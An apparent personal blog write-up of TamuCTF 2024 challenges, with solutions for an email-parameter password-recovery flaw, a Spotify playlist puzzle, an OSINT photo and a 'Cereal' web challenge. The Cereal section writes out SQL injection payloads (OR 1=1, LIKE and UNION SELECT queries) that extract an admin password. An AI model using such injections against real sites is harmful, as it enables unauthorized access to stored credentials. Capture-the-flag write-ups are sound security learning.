TAMU CTF 2024

Challenges Resolved for TamuCTF 2024

Reveille Petter - Rev (Very Easy)

Cheat Engine

Forgotten Password - Web (Easy)

class RecoveryMailer < ApplicationMailer
  def recovery_email(email)
    mail(to: email, subject: 'Flag')
  end
end
┌──[192.168.1.44💩kraken]
└──╼[😈]~/MatavieHash/ctfs/tamu/web/forgotten_pass/src $ cat app/controllers/auth_controller.rb
class AuthController < ApplicationController


  def login
  end

  def forget
  end

  def recover
    user_found = false
    User.all.each { |user|
      if params[:email].include?(user.email)
        user_found = true
        break
      end
    }

    if user_found
      RecoveryMailer.recovery_email(params[:email]).deliver_now
      redirect_to forgot_password_path, notice: 'Password reset email sent'
    else
      redirect_to forgot_password_path, alert: 'You are not a registered user!'
    end

  end
end

We needed to submit a password reset email to a valid user that is given to us in order to recieve the flag (b8500763@gmail.com) But we can input more than one email in the same parameter (thats the vuln) I think this one worked

or this one

But I get the flag in my temp mail

Missing - Misc (Easy)

We got a missong song in spotify:

We use Exportify to load the csv of the playlist

Then copy the ID of the song

Flag = gigem{I-like-You-The-Most-SHAD}

Lost tourist - OSINT (Easy)

Weir challenge because the photo is not taken from there photo given:

Valid solution: gigem{Helix_Bridge}

Cereal - Web (medium)

We are given guest:password and creds and we get a serialized cookie, attempting some injections we get an error, so its porobably an sql injection

Doing or 1=1-- - gives admin user

This injection works: ' OR password LIKE '%gigem{%'-- -"

So the flag is admin password ' UNION SELECT 'test','test2','test3','test4'-- -

' UNION SELECT password,'test2','test3',NULL FROM users WHERE username='admin'-- -

That was all for today´s write up, Hope you´ve enjoyed it.

I will be uploading a new write up every weekend, so don´t forget to stay up to the blog 😄

You can use my social media to leave me your thoughts about the write ups 👍

Twitter: https://twitter.com/KrakenEU_
Linkedin: https://www.linkedin.com/in/i%C3%B1aki-tornos-572580177/
Github: https://github.com/KrakenEU/
Previous(Web)HTB - Breaking GradNextJerseyCTF - 2024

Last updated